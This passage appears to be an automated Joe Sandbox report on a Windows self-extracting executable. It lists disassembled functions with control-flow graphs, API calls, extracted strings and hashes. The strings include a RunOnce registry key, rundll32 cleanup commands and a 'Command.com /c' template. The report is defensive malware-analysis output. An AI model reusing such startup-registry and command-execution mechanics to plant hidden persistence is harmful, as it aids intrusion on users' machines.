7ff6975a46ec-7ff6975a4717 RegSetValueExA 88->93 89->100 94 7ff6975a441f-7ff6975a4427 90->94 95 7ff6975a4417-7ff6975a441b 90->95 93->70 98 7ff6975a4431-7ff6975a4433 94->98 99 7ff6975a4429-7ff6975a442d 94->99 95->94 102 7ff6975a4435-7ff6975a4439 98->102 103 7ff6975a443d-7ff6975a4445 98->103 99->98 100->23 102->103 104 7ff6975a444f-7ff6975a4451 103->104 105 7ff6975a4447-7ff6975a444b 103->105 107 7ff6975a4453-7ff6975a4457 104->107 108 7ff6975a445b-7ff6975a447e 104->108 105->104 107->108 110 7ff6975a4480-7ff6975a4491 FreeLibrary 108->110 111 7ff6975a44d3-7ff6975a44da FreeLibrary 108->111 110->80 111->58
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                          • String ID: 52352352352$<None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                          • API String ID: 2679723528-157190445
                                                          • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                          • Instruction ID: 148114e4ceea375a9e08866cd2c0a0db8f9b2560fa6354b38cf00a7bd61349e3
                                                          • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                          • Instruction Fuzzy Hash: 5602A171A0878286FBF89B54E8406BA7BA0FF847E4F5441B5DA4E83694DF3CE945C720
                                                          Function 00007FF6975A1D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183registrylibrarymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                          • API String ID: 178549006-607953301
                                                          • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                          • Instruction ID: d681a4fad019164715e56b109edabc687695848ea498c9625e710586c156d20a
                                                          • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                          • Instruction Fuzzy Hash: F481A632B08B8687EBA48F21E8402B9BBA4FB89BE4F4451B5DA4E87754DF3CD505C750
                                                          Function 00007FF6975A1684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 144 7ff6975a1684-7ff6975a16ce 145 7ff6975a16d3-7ff6975a16dd 144->145 146 7ff6975a16df-7ff6975a16e5 145->146 147 7ff6975a16f2-7ff6975a1704 145->147 146->147 148 7ff6975a16e7-7ff6975a16f0 146->148 149 7ff6975a1713-7ff6975a171a 147->149 150 7ff6975a1706-7ff6975a1711 147->150 148->145 148->147 151 7ff6975a171e-7ff6975a173c call 7ff6975a15e8 149->151 150->151 154 7ff6975a173e 151->154 155 7ff6975a17aa-7ff6975a17c2 151->155 157 7ff6975a1741-7ff6975a1748 154->157 156 7ff6975a17c7-7ff6975a17d1 155->156 158 7ff6975a17d3-7ff6975a17d9 156->158 159 7ff6975a17e6-7ff6975a17ff call 7ff6975a7ba8 156->159 157->157 160 7ff6975a174a-7ff6975a174e 157->160 158->159 161 7ff6975a17db-7ff6975a17e4 158->161 164 7ff6975a1804-7ff6975a1814 call 7ff6975a7d68 159->164 160->155 163 7ff6975a1750-7ff6975a1757 160->163 161->156 161->159 165 7ff6975a175e-7ff6975a1760 163->165 166 7ff6975a1759-7ff6975a175c 163->166 174 7ff6975a1a1b-7ff6975a1a2b call 7ff6975a7d68 164->174 175 7ff6975a181a-7ff6975a1847 CompareStringA 164->175 165->155 169 7ff6975a1762-7ff6975a1764 165->169 166->165 168 7ff6975a1766-7ff6975a1776 166->168 171 7ff6975a177b-7ff6975a1785 168->171 169->155 169->168 172 7ff6975a1787-7ff6975a178d 171->172 173 7ff6975a179a-7ff6975a17a8 171->173 172->173 176 7ff6975a178f-7ff6975a1798 172->176 173->164 183 7ff6975a1a31-7ff6975a1a5e CompareStringA 174->183 184 7ff6975a1acb-7ff6975a1ae9 LocalAlloc 174->184 175->174 178 7ff6975a184d-7ff6975a1861 GetFileAttributesA 175->178 176->171 176->173 180 7ff6975a19f3-7ff6975a19fb 178->180 181 7ff6975a1867-7ff6975a186f 178->181 182 7ff6975a1a00-7ff6975a1a16 call 7ff6975a4dcc 180->182 181->180 185 7ff6975a1875-7ff6975a1891 call 7ff6975a15e8 181->185 199 7ff6975a1bda-7ff6975a1c03 call 7ff6975a8470 182->199 183->184 190 7ff6975a1a60-7ff6975a1a67 183->190 188 7ff6975a1aa2-7ff6975a1aad 184->188 189 7ff6975a1aeb-7ff6975a1aff GetFileAttributesA 184->189 197 7ff6975a1893-7ff6975a18b0 call 7ff6975a15e8 185->197 198 7ff6975a18b5-7ff6975a18d1 LocalAlloc 185->198 188->182 193 7ff6975a1b7e-7ff6975a1b88 189->193 194 7ff6975a1b01-7ff6975a1b03 189->194 195 7ff6975a1a6a-7ff6975a1a71 190->195 196 7ff6975a1b8f-7ff6975a1b99 193->196 194->193 200 7ff6975a1b05-7ff6975a1b16 194->200 195->195 201 7ff6975a1a73 195->201 202 7ff6975a1bae-7ff6975a1bb9 196->202 203 7ff6975a1b9b-7ff6975a1ba1 196->203 197->198 198->188 205 7ff6975a18d7-7ff6975a194d GetPrivateProfileIntA GetPrivateProfileStringA 198->205 206 7ff6975a1b1d-7ff6975a1b27 200->206 208 7ff6975a1a78-7ff6975a1a7f 201->208 210 7ff6975a1bbc-7ff6975a1bcc call 7ff6975a2a6c 202->210 203->202 209 7ff6975a1ba3-7ff6975a1bac 203->209 211 7ff6975a194f-7ff6975a197f call 7ff6975a1008 * 2 205->211 212 7ff6975a1984-7ff6975a1993 205->212 213 7ff6975a1b29-7ff6975a1b2f 206->213 214 7ff6975a1b3c-7ff6975a1b4d 206->214 208->208 216 7ff6975a1a81-7ff6975a1aa0 LocalAlloc 208->216 209->196 209->202 225 7ff6975a1bd1-7ff6975a1bd5 210->225 211->225 221 7ff6975a1995-7ff6975a19b8 GetShortPathNameA 212->221 222 7ff6975a19ba 212->222 213->214 219 7ff6975a1b31-7ff6975a1b3a 213->219 214->210 220 7ff6975a1b4f-7ff6975a1b52 214->220 216->188 223 7ff6975a1ab2-7ff6975a1ac6 call 7ff6975a114c 216->223 219->206 219->214 220->210 227 7ff6975a1b54-7ff6975a1b7c call 7ff6975a1084 * 2 220->227 228 7ff6975a19c1-7ff6975a19ee call 7ff6975a114c 221->228 222->228 223->225 225->199 227->210 228->225
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                          • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                          • API String ID: 383838535-3614570713
                                                          • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                          • Instruction ID: d75d3ae7e22d2d7f82a9d11e80388bf0773fa02a3fd47cf894ebde2de7870acf
                                                          • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                          • Instruction Fuzzy Hash: 2EE19E62A0878685EFB98F20A4002BA77B1FB457E4F9441B6DA4DC7B95DF3DD909C320
                                                          Function 00007FF6975A66C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 7ff6975a66c4-7ff6975a6724 call 7ff6975a5050 LocalAlloc 241 7ff6975a6756-7ff6975a676a call 7ff6975a5050 238->241 242 7ff6975a6726-7ff6975a6749 call 7ff6975a4dcc call 7ff6975a7700 238->242 248 7ff6975a67a5-7ff6975a67ea lstrcmpA LocalFree 241->248 249 7ff6975a676c-7ff6975a67a3 call 7ff6975a4dcc LocalFree 241->249 254 7ff6975a674f-7ff6975a6751 242->254 252 7ff6975a6837-7ff6975a683d 248->252 253 7ff6975a67ec-7ff6975a67ee 248->253 249->254 255 7ff6975a6843-7ff6975a6849 252->255 256 7ff6975a6b14-7ff6975a6b38 call 7ff6975a7ac8 252->256 258 7ff6975a67f0-7ff6975a67f9 253->258 259 7ff6975a67fb 253->259 261 7ff6975a6b3a-7ff6975a6b66 call 7ff6975a8470 254->261 255->256 263 7ff6975a684f-7ff6975a6870 GetTempPathA 255->263 256->261 258->259 260 7ff6975a67fe-7ff6975a680e call 7ff6975a64e4 258->260 259->260 273 7ff6975a6b0f-7ff6975a6b12 260->273 274 7ff6975a6814-7ff6975a6832 call 7ff6975a4dcc 260->274 267 7ff6975a6872-7ff6975a687e call 7ff6975a64e4 263->267 268 7ff6975a68ad-7ff6975a68b9 263->268 276 7ff6975a6883-7ff6975a6885 267->276 270 7ff6975a68bc-7ff6975a68bf 268->270 275 7ff6975a68c4-7ff6975a68ce 270->275 273->261 274->254 278 7ff6975a68e1-7ff6975a68f3 275->278 279 7ff6975a68d0-7ff6975a68d5 275->279 276->273 280 7ff6975a688b-7ff6975a6895 call 7ff6975a2468 276->280 283 7ff6975a68f9-7ff6975a690f GetDriveTypeA 278->283 284 7ff6975a6adb-7ff6975a6b04 GetWindowsDirectoryA call 7ff6975a6ca4 278->284 279->278 282 7ff6975a68d7-7ff6975a68df 279->282 280->268 290 7ff6975a6897-7ff6975a68a7 call 7ff6975a64e4 280->290 282->275 282->278 287 7ff6975a6911-7ff6975a6914 283->287 288 7ff6975a6916-7ff6975a692a GetFileAttributesA 283->288 284->254 295 7ff6975a6b0a 284->295 287->288 292 7ff6975a6930-7ff6975a6933 287->292 288->292 293 7ff6975a69bd-7ff6975a69d0 call 7ff6975a6ca4 288->293 290->268 290->273 297 7ff6975a6935-7ff6975a693f 292->297 298 7ff6975a69ad 292->298 304 7ff6975a69d2-7ff6975a69de call 7ff6975a2468 293->304 305 7ff6975a69f4-7ff6975a6a00 call 7ff6975a2468 293->305 295->270 300 7ff6975a69b1-7ff6975a69b8 297->300 302 7ff6975a6941-7ff6975a6953 297->302 298->300 303 7ff6975a6ad2-7ff6975a6ad5 300->303 302->300 306 7ff6975a6955-7ff6975a6981 GetDiskFreeSpaceA 302->306 303->283 303->284 304->298 315 7ff6975a69e0-7ff6975a69f2 call 7ff6975a6ca4 304->315 313 7ff6975a6a02-7ff6975a6a11 GetWindowsDirectoryA 305->313 314 7ff6975a6a16-7ff6975a6a3e call 7ff6975a7ba8 GetFileAttributesA 305->314 306->298 307 7ff6975a6983-7ff6975a69a4 MulDiv 306->307 307->298 310 7ff6975a69a6-7ff6975a69ab 307->310 310->293 310->298 313->314 320 7ff6975a6a40-7ff6975a6a53 CreateDirectoryA 314->320 321 7ff6975a6a55 314->321 315->298 315->305 322 7ff6975a6a58-7ff6975a6a5a 320->322 321->322 323 7ff6975a6a6d-7ff6975a6a8e SetFileAttributesA 322->323 324 7ff6975a6a5c-7ff6975a6a6b 322->324 325 7ff6975a6a91-7ff6975a6a9b 323->325 324->303 326 7ff6975a6aaf-7ff6975a6acc call 7ff6975a64e4 325->326 327 7ff6975a6a9d-7ff6975a6aa3 325->327 326->273 331 7ff6975a6ace 326->331 327->326 328 7ff6975a6aa5-7ff6975a6aad 327->328 328->325 328->326 331->303
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                          • API String ID: 3973824516-1370313076
                                                          • Opcode ID: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                          • Instruction ID: fa6cb5e92e48863b18bbcf1c2fa2adb96950e12ba4cadc71f2d2d6dd0b51c9ef
                                                          • Opcode Fuzzy Hash: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                          • Instruction Fuzzy Hash: 91D1B332A18682C6EBB89B20E4506BA77A1FF957E0F5440B5DA4EC3695DF3DE805C720
                                                          Function 00007FF6975A2DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 332 7ff6975a2db4-7ff6975a2e4d call 7ff6975a8b09 memset * 2 call 7ff6975a5050 337 7ff6975a2e53-7ff6975a2e94 CreateEventA SetEvent call 7ff6975a5050 332->337 338 7ff6975a30a5 332->338 343 7ff6975a2ec3-7ff6975a2ecb 337->343 344 7ff6975a2e96-7ff6975a2ea0 337->344 340 7ff6975a30aa-7ff6975a30b9 call 7ff6975a4dcc 338->340 345 7ff6975a30be 340->345 348 7ff6975a2ed5-7ff6975a2ef0 call 7ff6975a5050 343->348 349 7ff6975a2ecd-7ff6975a2ecf 343->349 346 7ff6975a2ea2-7ff6975a2ebe call 7ff6975a4dcc 344->346 347 7ff6975a30c0-7ff6975a30e3 call 7ff6975a8470 345->347 346->345 358 7ff6975a2efe-7ff6975a2f1c CreateMutexA 348->358 359 7ff6975a2ef2-7ff6975a2efc 348->359 349->348 352 7ff6975a2fa3-7ff6975a2fb3 call 7ff6975a70a8 349->352 362 7ff6975a2fb5-7ff6975a2fbf 352->362 363 7ff6975a2fc4-7ff6975a2fcb 352->363 358->352 361 7ff6975a2f22-7ff6975a2f33 GetLastError 358->361 359->346 361->352 366 7ff6975a2f35-7ff6975a2f48 361->366 362->340 364 7ff6975a2fde-7ff6975a2ffd FindResourceExA 363->364 365 7ff6975a2fcd-7ff6975a2fd9 call 7ff6975a204c 363->365 368 7ff6975a2fff-7ff6975a3011 LoadResource 364->368 369 7ff6975a3014-7ff6975a301b 364->369 365->345 370 7ff6975a2f62-7ff6975a2f7f call 7ff6975a4dcc 366->370 371 7ff6975a2f4a-7ff6975a2f60 call 7ff6975a4dcc 366->371 368->369 374 7ff6975a3029-7ff6975a3030 369->374 375 7ff6975a301d-7ff6975a3024 #17 369->375 370->352 381 7ff6975a2f81-7ff6975a2f9e CloseHandle 370->381 371->381 378 7ff6975a3032-7ff6975a3035 374->378 379 7ff6975a303a-7ff6975a3044 call 7ff6975a3bf4 374->379 375->374 378->347 379->345 384 7ff6975a3046-7ff6975a3055 379->384 381->345 384->378 385 7ff6975a3057-7ff6975a3061 384->385 385->378 386 7ff6975a3063-7ff6975a306a 385->386 386->378 387 7ff6975a306c-7ff6975a3073 call 7ff6975a12ec 386->387 387->378 390 7ff6975a3075-7ff6975a30a1 call 7ff6975a7ac8 387->390 390->345 393 7ff6975a30a3 390->393 393->378
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                          • String ID: $52352352352$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                          • API String ID: 3100096412-2209769548
                                                          • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                          • Instruction ID: 38450191463b058fb827f638a4d5305512d14637e17b0f6327e34d25e9c80083
                                                          • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                          • Instruction Fuzzy Hash: 6D817A71A0C64386FBF89B24A9017B976A0FF997E8F4040B5D94EC26A5DF7CE445CB20
                                                          Function 00007FF6975A6CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 394 7ff6975a6ca4-7ff6975a6d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff6975a6d3f-7ff6975a6d7a GetDiskFreeSpaceA 394->395 396 7ff6975a6d12-7ff6975a6d3a call 7ff6975a4dcc call 7ff6975a7700 394->396 398 7ff6975a6d80-7ff6975a6da8 MulDiv 395->398 399 7ff6975a6f63-7ff6975a6fb8 memset call 7ff6975a7700 GetLastError FormatMessageA 395->399 414 7ff6975a6fe9 396->414 398->399 402 7ff6975a6dae-7ff6975a6de4 GetVolumeInformationA 398->402 409 7ff6975a6fbd-7ff6975a6fe4 call 7ff6975a4dcc SetCurrentDirectoryA 399->409 405 7ff6975a6e45-7ff6975a6e68 SetCurrentDirectoryA 402->405 406 7ff6975a6de6-7ff6975a6e40 memset call 7ff6975a7700 GetLastError FormatMessageA 402->406 407 7ff6975a6e6c-7ff6975a6e73 405->407 406->409 412 7ff6975a6e75-7ff6975a6e7a 407->412 413 7ff6975a6e86-7ff6975a6e99 407->413 409->414 412->413 417 7ff6975a6e7c-7ff6975a6e84 412->417 418 7ff6975a6e9d-7ff6975a6ea0 413->418 416 7ff6975a6feb-7ff6975a701a call 7ff6975a8470 414->416 417->407 417->413 421 7ff6975a6eae-7ff6975a6eb2 418->421 422 7ff6975a6ea2-7ff6975a6eac 418->422 424 7ff6975a6eb4-7ff6975a6ed3 call 7ff6975a4dcc 421->424 425 7ff6975a6ed8-7ff6975a6edf 421->425 422->418 422->421 424->414 427 7ff6975a6f0e-7ff6975a6f1f 425->427 428 7ff6975a6ee1-7ff6975a6ee9 425->428 429 7ff6975a6f22-7ff6975a6f2a 427->429 428->427 431 7ff6975a6eeb-7ff6975a6f0c 428->431 432 7ff6975a6f46-7ff6975a6f49 429->432 433 7ff6975a6f2c-7ff6975a6f30 429->433 431->429 435 7ff6975a6f4f-7ff6975a6f52 432->435 436 7ff6975a6f4b-7ff6975a6f4d 432->436 434 7ff6975a6f32 433->434 437 7ff6975a6f54-7ff6975a6f5e 434->437 438 7ff6975a6f34-7ff6975a6f41 call 7ff6975a24f8 434->438 435->434 436->434 437->416 438->416
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 4237285672-388467436
                                                          • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                          • Instruction ID: 8def2f145f64ebfe66fc0189a31d873f90a59e23c235672768a9064cb4e3cecb
                                                          • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                          • Instruction Fuzzy Hash: 4FA1B836A18742C7E7B89F20E4406BABBA5FB897A4F444175DA4E83B58DF3DD405CB10
                                                          Function 00007FF6975A5D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                          • String ID: *MEMCAB$CABINET
                                                          • API String ID: 1305606123-2642027498
                                                          • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                          • Instruction ID: ded3783b5183e864ac80915495cc7bba5e9866c59a275f20d0f9cbbe413259fc
                                                          • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                          • Instruction Fuzzy Hash: A25129B1A08B4386FBB89B10E8447B57BA0FF897A5F8481B5C94E86758DF3CE005C760
                                                          Function 00007FF6975A30EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151libraryfileloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 525 7ff6975a30ec-7ff6975a3114 526 7ff6975a3141-7ff6975a3148 call 7ff6975a5fe4 525->526 527 7ff6975a3116-7ff6975a311c 525->527 534 7ff6975a314e-7ff6975a3155 call 7ff6975a66c4 526->534 535 7ff6975a3236 526->535 529 7ff6975a311e call 7ff6975a60a4 527->529 530 7ff6975a3134-7ff6975a313b call 7ff6975a3f74 527->530 536 7ff6975a3123-7ff6975a3125 529->536 530->526 530->535 534->535 543 7ff6975a315b-7ff6975a319d GetSystemDirectoryA call 7ff6975a7ba8 LoadLibraryA 534->543 539 7ff6975a3238-7ff6975a3258 call 7ff6975a8470 535->539 536->535 540 7ff6975a312b-7ff6975a3132 536->540 540->526 540->530 547 7ff6975a319f-7ff6975a31b8 GetProcAddress 543->547 548 7ff6975a31c9-7ff6975a31de FreeLibrary 543->548 547->548 549 7ff6975a31ba-7ff6975a31c3 DecryptFileA 547->549 550 7ff6975a3273-7ff6975a3288 SetCurrentDirectoryA 548->550 551 7ff6975a31e4-7ff6975a31ea 548->551 549->548 552 7ff6975a3291-7ff6975a3297 550->552 553 7ff6975a328a-7ff6975a328f 550->553 551->550 554 7ff6975a31f0-7ff6975a320b GetWindowsDirectoryA 551->554 556 7ff6975a332d-7ff6975a3335 552->556 557 7ff6975a329d-7ff6975a32a4 552->557 555 7ff6975a3212-7ff6975a3230 call 7ff6975a4dcc call 7ff6975a7700 553->555 558 7ff6975a325a-7ff6975a326a call 7ff6975a6ca4 554->558 559 7ff6975a320d 554->559 555->535 561 7ff6975a3337-7ff6975a3339 556->561 562 7ff6975a3349 556->562 563 7ff6975a32a9-7ff6975a32b7 557->563 567 7ff6975a326f-7ff6975a3271 558->567 559->555 561->562 568 7ff6975a333b-7ff6975a3342 call 7ff6975a2318 561->568 566 7ff6975a334b-7ff6975a3359 562->566 563->563 569 7ff6975a32b9-7ff6975a32c0 563->569 574 7ff6975a3376-7ff6975a337d 566->574 575 7ff6975a335b-7ff6975a3361 566->575 567->535 567->550 576 7ff6975a3347 568->576 571 7ff6975a32c2-7ff6975a32c9 569->571 572 7ff6975a32fb call 7ff6975a5d90 569->572 571->572 577 7ff6975a32cb-7ff6975a32f1 call 7ff6975a7ac8 571->577 584 7ff6975a3300 572->584 581 7ff6975a337f-7ff6975a3381 574->581 582 7ff6975a3388-7ff6975a338d 574->582 575->574 580 7ff6975a3363 call 7ff6975a40c4 575->580 576->566 587 7ff6975a32f6-7ff6975a32f9 577->587 589 7ff6975a3368-7ff6975a336a 580->589 581->582 586 7ff6975a3383 call 7ff6975a494c 581->586 582->539 588 7ff6975a3302 584->588 586->582 587->588 591 7ff6975a3313-7ff6975a3321 call 7ff6975a772c 588->591 592 7ff6975a3304-7ff6975a330e 588->592 589->535 593 7ff6975a3370 589->593 591->535 596 7ff6975a3327 591->596 592->535 593->574 596->556
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
